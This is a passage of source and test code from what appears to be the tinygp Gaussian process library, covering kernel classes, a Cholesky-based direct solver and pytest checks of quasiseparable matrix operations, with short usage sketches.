return self.kernel1.evaluate(X1, X2) + self.kernel2.evaluate(X1, X2)
@dataclass
class Product(Kernel):
"""A helper to represent the product of two kernels"""
kernel1: Kernel
kernel2: Kernel
def evaluate(self, X1: JAXArray, X2: JAXArray) -> JAXArray:
return self.kernel1.evaluate(X1, X2) * self.kernel2.evaluate(X1, X2)
@dataclass
class Constant(Kernel):
r"""This kernel returns the constant
.. math::
k(\mathbf{x}_i,\,\mathbf{x}_j) = c
where :math:`c` is a parameter.
Args:
        value: The parameter :math:`c` in the above equation.
"""
value: JAXArray
def __post_init__(self) -> None:
if jnp.ndim(self.value) != 0:
raise ValueError("The value of a constant kernel must be a scalar")
def evaluate(self, X1: JAXArray, X2: JAXArray) -> JAXArray:
return self.value
@dataclass
class DotProduct(Kernel):
r"""The dot product kernel
.. math::
k(\mathbf{x}_i,\,\mathbf{x}_j) = \mathbf{x}_i \cdot \mathbf{x}_j
with no parameters.
"""
def evaluate(self, X1: JAXArray, X2: JAXArray) -> JAXArray:
return X1 @ X2
@dataclass
class Polynomial(Kernel):
r"""A polynomial kernel
.. math::
k(\mathbf{x}_i,\,\mathbf{x}_j) = [(\mathbf{x}_i / \ell) \cdot
(\mathbf{x}_j / \ell) + \sigma^2]^P
Args:
order: The power :math:`P`.
scale: The parameter :math:`\ell`.
sigma: The parameter :math:`\sigma`.
"""
order: JAXArray
scale: JAXArray = jnp.ones(())
sigma: JAXArray = jnp.zeros(())
def evaluate(self, X1: JAXArray, X2: JAXArray) -> JAXArray:
return (
(X1 / self.scale) @ (X2 / self.scale) + jnp.square(self.sigma)
) ** self.order
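# Illustrative sketch (argument values are arbitrary): a quadratic kernel
# with unit length scale and a small offset:
#
#   k = Polynomial(order=2.0, sigma=jnp.sqrt(0.1))
#   K = k(x1, x2)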
```
#### File: tinygp/solvers/direct.py
```python
from __future__ import annotations
__all__ = ["DirectSolver"]
from typing import Any, Optional
import jax.numpy as jnp
import numpy as np
from jax.scipy import linalg
from tinygp import kernels
from tinygp.helpers import JAXArray, dataclass
from tinygp.solvers.solver import Solver
@dataclass
class DirectSolver(Solver):
X: JAXArray
variance_value: JAXArray
covariance_value: JAXArray
scale_tril: JAXArray
@classmethod
def init(
cls,
kernel: kernels.Kernel,
X: JAXArray,
diag: JAXArray,
*,
covariance: Optional[Any] = None,
) -> "DirectSolver":
variance = kernel(X) + diag
if covariance is None:
covariance = construct_covariance(kernel, X, diag)
scale_tril = linalg.cholesky(covariance, lower=True)
return cls(
X=X,
variance_value=variance,
covariance_value=covariance,
scale_tril=scale_tril,
)
def variance(self) -> JAXArray:
return self.variance_value
def covariance(self) -> JAXArray:
return self.covariance_value
def normalization(self) -> JAXArray:
return jnp.sum(
jnp.log(jnp.diag(self.scale_tril))
) + 0.5 * self.scale_tril.shape[0] * np.log(2 * np.pi)
def solve_triangular(
self, y: JAXArray, *, transpose: bool = False
) -> JAXArray:
if transpose:
return linalg.solve_triangular(
self.scale_tril, y, lower=True, trans=1
)
else:
return linalg.solve_triangular(self.scale_tril, y, lower=True)
def dot_triangular(self, y: JAXArray) -> JAXArray:
return jnp.einsum("ij,j...->i...", self.scale_tril, y)
def condition(
self,
kernel: kernels.Kernel,
X_test: Optional[JAXArray],
diag: Optional[JAXArray],
) -> Any:
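        # Computes the conditioned (posterior) covariance Kss - Ks^T K^{-1} Ks,
        # applying the inverse through triangular solves against the Cholesky
        # factor built in init.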
if X_test is None:
Ks = kernel(self.X, self.X)
if diag is None:
Kss = Ks
else:
Kss = construct_covariance(kernel, self.X, diag)
else:
if diag is None:
Kss = kernel(X_test, X_test)
else:
Kss = construct_covariance(kernel, X_test, diag)
Ks = kernel(self.X, X_test)
A = self.solve_triangular(Ks)
return Kss - A.transpose() @ A
def construct_covariance(
kernel: kernels.Kernel, X: JAXArray, diag: JAXArray
) -> JAXArray:
covariance = kernel(X, X)
covariance = covariance.at[jnp.diag_indices(covariance.shape[0])].add(diag) # type: ignore
return covariance
```
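
A sketch of driving `DirectSolver` by hand to evaluate a GP marginal log-likelihood (hypothetical usage; the `Matern32` kernel and its `scale` argument are assumptions, and in practice the solver is normally constructed by a higher-level `GaussianProcess` object rather than directly):

```python
import jax.numpy as jnp

from tinygp import kernels
from tinygp.solvers.direct import DirectSolver

X = jnp.linspace(0.0, 10.0, 50)
y = jnp.sin(X)

solver = DirectSolver.init(
    kernels.Matern32(scale=1.5),  # assumed kernel; any Kernel should work
    X,
    jnp.full_like(X, 1e-4),       # observational variance added to the diagonal
)

# Whitened residuals z = L^{-1} y satisfy y^T K^{-1} y = z @ z, so the
# log-likelihood needs one triangular solve plus the normalization term.
z = solver.solve_triangular(y)
log_prob = -0.5 * z @ z - solver.normalization()
```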
#### File: test_solvers/test_quasisep/test_core.py
```python
from itertools import combinations
import jax.numpy as jnp
import numpy as np
import pytest
from tinygp.solvers.quasisep.core import (
DiagQSM,
LowerTriQSM,
SquareQSM,
StrictLowerTriQSM,
StrictUpperTriQSM,
SymmQSM,
)
@pytest.fixture(params=["random", "celerite"])
def name(request):
return request.param
@pytest.fixture
def matrices(name):
return get_matrices(name)
@pytest.fixture
def some_nice_matrices():
diag1, p1, q1, a1, _, _, _, _ = get_matrices("celerite")
diag2, p2, q2, a2, _, _, _, _ = get_matrices("random")
mat1 = LowerTriQSM(
diag=DiagQSM(diag1),
lower=StrictLowerTriQSM(p=p1, q=q1, a=a1),
)
mat2 = SquareQSM(
diag=DiagQSM(diag2),
lower=StrictLowerTriQSM(p=p2, q=q2, a=a2),
upper=StrictUpperTriQSM(p=p2, q=q2, a=a2),
)
mat3 = SquareQSM(
diag=DiagQSM(diag1),
lower=StrictLowerTriQSM(p=p1, q=q1, a=a1),
upper=StrictUpperTriQSM(
p=jnp.zeros_like(p2), q=jnp.zeros_like(q2), a=a2
),
)
mat4 = SquareQSM(
diag=DiagQSM(diag1),
lower=StrictLowerTriQSM(p=p1, q=q1, a=a1),
upper=StrictUpperTriQSM(p=p2, q=q2, a=a2),
)
return mat1, mat2, mat3, mat4
def get_matrices(name):
N = 100
random = np.random.default_rng(1234)
diag = np.exp(random.normal(size=N))
if name == "random":
J = 5
p = random.normal(size=(N, J))
q = random.normal(size=(N, J))
a = np.repeat(np.eye(J)[None, :, :], N, axis=0)
l = np.tril(p @ q.T, -1)
u = np.triu(q @ p.T, 1)
diag += np.sum(p * q, axis=1)
elif name == "celerite":
t = np.sort(random.uniform(0, 10, N))
a = np.array([1.0, 2.5])
b = np.array([0.5, 1.5])
c = np.array([1.2, 0.5])
d = np.array([0.5, 0.1])
tau = np.abs(t[:, None] - t[None, :])[:, :, None]
K = np.sum(
np.exp(-c[None, None] * tau)
* (
a[None, None] * np.cos(d[None, None] * tau)
+ b[None, None] * np.sin(d[None, None] * tau)
),
axis=-1,
)
K[np.diag_indices_from(K)] += diag
diag = np.diag(K)
l = np.tril(K, -1)
u = np.triu(K, 1)
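        # Recover the semiseparable generators for this kernel: the trig
        # factors go into p and q, while a carries the exponential decay
        # accumulated between neighboring input times.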
cos = np.cos(d[None] * t[:, None])
sin = np.sin(d[None] * t[:, None])
p = np.concatenate(
(
a[None] * cos + b[None] * sin,
a[None] * sin - b[None] * cos,
),
axis=1,
)
q = np.concatenate((cos, sin), axis=1)
c = np.append(c, c)
dt = np.append(0, np.diff(t))
a = np.stack(
[np.diag(v) for v in np.exp(-c[None] * dt[:, None])], axis=0
)
p = np.einsum("ni,nij->nj", p, a)
else:
assert False
v = random.normal(size=N)
m = random.normal(size=(N, 4))
return diag, p, q, a, v, m, l, u
def test_quasisep_def():
random = np.random.default_rng(2022)
n = 17
m1 = 3
m2 = 5
d = random.normal(size=n)
p = random.normal(size=(n, m1))
q = random.normal(size=(n, m1))
a = random.normal(size=(n, m1, m1))
g = random.normal(size=(n, m2))
h = random.normal(size=(n, m2))
b = random.normal(size=(n, m2, m2))
m = SquareQSM(
diag=DiagQSM(d=d),
lower=StrictLowerTriQSM(p=p, q=q, a=a),
upper=StrictUpperTriQSM(p=g, q=h, a=b),
).to_dense()
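    # Entry (i, j) should match the generator definition: d[i] on the
    # diagonal, p[i] @ a[i-1] @ ... @ a[j+1] @ q[j] below it, and
    # h[i] @ b[i+1].T @ ... @ b[j-1].T @ g[j] above it.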
def get_value(i, j):
if i == j:
return d[i]
if j < i:
tmp = np.copy(q[j])
for k in range(j + 1, i):
tmp = a[k] @ tmp
return p[i] @ tmp
if j > i:
tmp = np.copy(h[i])
for k in range(i + 1, j):
tmp = tmp @ b[k].T
return tmp @ g[j]
for i in range(n):
for j in range(n):
np.testing.assert_allclose(get_value(i, j), m[i, j])
def test_strict_tri_matmul(matrices):
_, p, q, a, v, m, l, u = matrices
mat = StrictLowerTriQSM(p=p, q=q, a=a)
# Check multiplication into identity / to dense
np.testing.assert_allclose(mat.to_dense(), l)
np.testing.assert_allclose(mat.T.to_dense(), u)
# Check matvec
np.testing.assert_allclose(mat @ v, l @ v)
np.testing.assert_allclose(mat.T @ v, u @ v)
# Check matmat
np.testing.assert_allclose(mat @ m, l @ m)
np.testing.assert_allclose(mat.T @ m, u @ m)
def test_tri_matmul(matrices):
diag, p, q, a, v, m, l, _ = matrices
mat = LowerTriQSM(
diag=DiagQSM(diag), lower=StrictLowerTriQSM(p=p, q=q, a=a)
)
dense = l + np.diag(diag)
# Check multiplication into identity / to dense
np.testing.assert_allclose(mat.to_dense(), dense)
np.testing.assert_allclose(mat.T.to_dense(), dense.T)
# Check matvec
np.testing.assert_allclose(mat @ v, dense @ v)
np.testing.assert_allclose(mat.T @ v, dense.T @ v)
# Check matmat
np.testing.assert_allclose(mat @ m, dense @ m)
np.testing.assert_allclose(mat.T @ m, dense.T @ m)
@pytest.mark.parametrize("symm", [True, False])
def test_square_matmul(symm, matrices):
diag, p, q, a, v, m, l, u = matrices
if symm:
mat = SymmQSM(
diag=DiagQSM(diag), lower=StrictLowerTriQSM(p=p, q=q, a=a)
)
else:
mat = SquareQSM(
diag=DiagQSM(diag),
lower=StrictLowerTriQSM(p=p, q=q, a=a),
upper=StrictUpperTriQSM(p=p, q=q, a=a),
)
# Create and double check the dense reconstruction
dense = mat.to_dense()
np.testing.assert_allclose(np.tril(dense, -1), l)
np.testing.assert_allclose(np.triu(dense, 1), u)
np.testing.assert_allclose(np.diag(dense), diag)
# Test matmuls
np.testing.assert_allclose(mat @ v, dense @ v)
np.testing.assert_allclose(mat @ m, dense @ m)
np.testing.assert_allclose(v.T @ mat, v.T @ dense)
np.testing.assert_allclose(m.T @ mat, m.T @ dense)
@pytest.mark.parametrize("name", ["celerite"])
def test_tri_inv(matrices):
diag, p, q, a, _, _, _, _ = matrices
mat = LowerTriQSM(
diag=DiagQSM(diag), lower=StrictLowerTriQSM(p=p, q=q, a=a)
)
dense = mat.to_dense()
minv = mat.inv()
np.testing.assert_allclose(minv.to_dense(), jnp.linalg.inv(dense))
np.testing.assert_allclose(
minv.matmul(dense), np.eye(len(diag)), atol=1e-12
)
@pytest.mark.parametrize("name", ["celerite"])
def test_tri_solve(matrices):
diag, p, q, a, v, m, _, _ = matrices
mat = LowerTriQSM(
diag=DiagQSM(diag), lower=StrictLowerTriQSM(p=p, q=q, a=a)
)
dense = mat.to_dense()
np.testing.assert_allclose(mat.solve(v), np.linalg.solve(dense, v))
np.testing.assert_allclose(mat.solve(m), np.linalg.solve(dense, m))
np.testing.assert_allclose(mat.T.solve(v), np.linalg.solve(dense.T, v))
np.testing.assert_allclose(mat.T.solve(m), np.linalg.solve(dense.T, m))
np.testing.assert_allclose(mat.inv().solve(v), dense @ v)
np.testing.assert_allclose(mat.inv().solve(m), dense @ m)
np.testing.assert_allclose(mat.T.inv().solve(v), dense.T @ v)
np.testing.assert_allclose(mat.T.inv().solve(m), dense.T @ m)
@pytest.mark.parametrize("symm", [True, False])
def test_square_inv(symm, matrices):
diag, p, q, a, _, _, l, u = matrices
if symm:
mat = SymmQSM(
diag=DiagQSM(diag), lower=StrictLowerTriQSM(p=p, q=q, a=a)
)
else:
mat = SquareQSM(
diag=DiagQSM(diag),
lower=StrictLowerTriQSM(p=p, q=q, a=a),
upper=StrictUpperTriQSM(p=p, q=q, a=a),
)
# Create and double check the dense reconstruction
dense = mat.to_dense()
np.testing.assert_allclose(np.tril(dense, -1), l)
np.testing.assert_allclose(np.triu(dense, 1), u)
np.testing.assert_allclose(np.diag(dense), diag)
# Invert the QS matrix
minv = mat.inv()
np.testing.assert_allclose(
minv.to_dense(), jnp.linalg.inv(dense), rtol=2e-6
)
np.testing.assert_allclose(
minv.matmul(dense), np.eye(len(diag)), atol=1e-12
)
    # The non-symmetric case is built with identical lower and upper
    # generators, so the matrix is symmetric in value and the generators
    # of its inverse should come out symmetric too
if not symm:
np.testing.assert_allclose(minv.lower.p, minv.upper.p)
np.testing.assert_allclose(minv.lower.q, minv.upper.q)
np.testing.assert_allclose(minv.lower.a, minv.upper.a)
    # Inverting the inverse should recover the original matrix (a pure
    # consistency check; there is no reason to do this in real code).
# Note: we can't actually directly compare the generators because there's
# enough degrees of freedom that they won't necessarily round trip. It's
# good enough to check that it produces the correct dense reconstruction.
mat2 = minv.inv()
np.testing.assert_allclose(mat2.to_dense(), dense, rtol=1e-4)
def test_gram(matrices):
diag, p, q, a, _, _, _, _ = matrices
mat = SquareQSM(
diag=DiagQSM(diag),
lower=StrictLowerTriQSM(p=p, q=q, a=a),
upper=StrictUpperTriQSM(p=p, q=q, a=a),
)
dense = mat.to_dense()
np.testing.assert_allclose(mat.gram().to_dense(), dense.T @ dense)
mat = mat.inv()
dense = mat.to_dense()
np.testing.assert_allclose(mat.gram().to_dense(), dense.T @ dense)
mat = SquareQSM(
diag=DiagQSM(diag),
lower=StrictLowerTriQSM(p=p, q=q, a=a),
upper=StrictUpperTriQSM(
p=jnp.zeros_like(p), q=jnp.zeros_like(q), a=jnp.zeros_like(a)
),
)
dense = mat.to_dense()
np.testing.assert_allclose(mat.gram().to_dense(), dense.T @ dense)
@pytest.mark.parametrize("name", ["celerite"])
def test_cholesky(matrices):
diag, p, q, a, v, m, _, _ = matrices
mat = SymmQSM(diag=DiagQSM(diag), lower=StrictLowerTriQSM(p=p, q=q, a=a))
dense = mat.to_dense()
chol = mat.cholesky()
np.testing.assert_allclose(chol.to_dense(), np.linalg.cholesky(dense))
mat = mat.inv()
dense = mat.to_dense()
chol = mat.cholesky()
np.testing.assert_allclose(chol.to_dense(), np.linalg.cholesky(dense))
np.testing.assert_allclose(
chol.solve(v), np.linalg.solve(chol.to_dense(), v)
)
np.testing.assert_allclose(
chol.solve(m), np.linalg.solve(chol.to_dense(), m)
)
def test_tri_qsmul(some_nice_matrices):
mat1, mat2, mat3, mat4 = some_nice_matrices
def check(mat1, mat2):
mat = mat1 @ mat2
a = mat.to_dense()
b = mat1.to_dense() @ mat2.to_dense()
np.testing.assert_allclose(np.diag(a), np.diag(b), atol=1e-12)
np.testing.assert_allclose(np.tril(a, -1), np.tril(b, -1), atol=1e-12)
np.testing.assert_allclose(np.triu(a, 1), np.triu(b, 1), atol=1e-12)
minv = mat1.inv()
mTinv = mat1.T.inv()
for m in [mat2, mat3, mat4, mat2.inv()]:
check(mat1, m)
check(minv, m)
check(mat1.T, m)
check(mTinv, m)
def test_square_qsmul(some_nice_matrices):
mat1, mat2, mat3, mat4 = some_nice_matrices
mat1 += mat1.lower.transpose()
def check(mat1, mat2):
mat = mat1 @ mat2
a = mat.to_dense()
b = mat1.to_dense() @ mat2.to_dense()
np.testing.assert_allclose(np.diag(a), np.diag(b), atol=1e-12)
np.testing.assert_allclose(np.tril(a, -1), np.tril(b, -1), atol=1e-12)
np.testing.assert_allclose(np.triu(a, 1), np.triu(b, 1), atol=1e-12)
for m1, m2 in combinations(
[mat1, mat2, mat3, mat4, mat1.inv(), mat2.inv()], 2
):
check(m1, m2)
def test_ops(some_nice_matrices):
mat1, mat2, mat3, mat4 = some_nice_matrices
def check(mat1, mat2):
for m1, m2 in combinations([mat1, mat2, mat1.lower, mat2.lower], 2):
a = m1.to_dense()
b = m2.to_dense()
np.testing.assert_allclose((-m1).to_dense(), -a, atol=1e-12)
np.testing.assert_allclose((m1 + m2).to_dense(), a + b, atol=1e-12)
np.testing.assert_allclose((m1 - m2).to_dense(), a - b, atol=1e-12)
np.testing.assert_allclose((m1 * m2).to_dense(), a * b, atol=1e-12)
np.testing.assert_allclose(
(2.5 * m1).to_dense(), 2.5 * a, atol=1e-12
)
for m1, m2 in combinations(
[mat1, mat2, mat3, mat4, mat1.inv(), mat2.inv()], 2
):
check(m1, m2)
```
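
To make the generator definition concrete, here is a self-contained NumPy sketch (hypothetical sizes, no tinygp dependency) that builds the strictly lower-triangular part of a quasiseparable matrix the same way `get_value` does:

```python
import numpy as np

rng = np.random.default_rng(0)
n, m = 6, 2
d = rng.normal(size=n)          # diagonal entries
p = rng.normal(size=(n, m))     # left generators
q = rng.normal(size=(n, m))     # right generators
a = rng.normal(size=(n, m, m))  # transition matrices

dense = np.diag(d)
for i in range(n):
    for j in range(i):
        # Lower triangle: p[i] @ a[i-1] @ ... @ a[j+1] @ q[j]
        tmp = q[j]
        for k in range(j + 1, i):
            tmp = a[k] @ tmp
        dense[i, j] = p[i] @ tmp
```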
#### File: test_solvers/test_quasisep/test_general.py
```python
import jax
import jax.numpy as jnp
import numpy as np
from tinygp.solvers.quasisep import kernels
from tinygp.solvers.quasisep.general import GeneralQSM
def test_matmul():
random = np.random.default_rng(1234)
x1 = np.sort(random.uniform(0, 10, 100))
x2 = np.sort(random.uniform(2, 8, 75))
kernel = kernels.Matern52(sigma=1.5, scale=3.4)
for (x1, x2) in [(x1, x2), (x1, x1), (x2, x1)]:
y = np.sin(x2)[:, None]
K = kernel(x1, x2)
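        # idx[i] is the index of the last x2 entry that is <= x1[i]
        # (or -1 when every x2 entry is larger), which is the split the
        # rectangular quasiseparable representation needs.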
idx = jnp.searchsorted(x2, x1, side="right") - 1
a = jax.vmap(kernel.A)(np.append(x2[0], x2[:-1]), x2)
ql = jax.vmap(kernel.q)(x2)
pl = jax.vmap(kernel.p)(x1)
qu = jax.vmap(kernel.q)(x1)
pu = jax.vmap(kernel.p)(x2)
i = jnp.clip(idx, 0, x2.shape[0] - 1)
pl = jax.vmap(jnp.dot)(pl, jax.vmap(kernel.A)(x2[i], x1))
i = jnp.clip(idx + 1, 0, x2.shape[0] - 1)
qu = jax.vmap(jnp.dot)(jax.vmap(kernel.A)(x1, x2[i]), qu)
mat = GeneralQSM(pl=pl, ql=ql, pu=pu, qu=qu, a=a, idx=idx)
np.testing.assert_allclose(mat.matmul(y), K @ y)
``` |
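
The `searchsorted` bookkeeping is the subtle part of this test; a tiny standalone sketch (hypothetical inputs) shows the index convention:

```python
import numpy as np

x1 = np.array([0.5, 2.0, 3.5])
x2 = np.array([1.0, 2.0, 3.0])

# For each x1[i], idx[i] points at the last x2 entry <= x1[i], or -1 when
# every x2 entry is larger.
idx = np.searchsorted(x2, x1, side="right") - 1
print(idx)  # [-1  1  2]
```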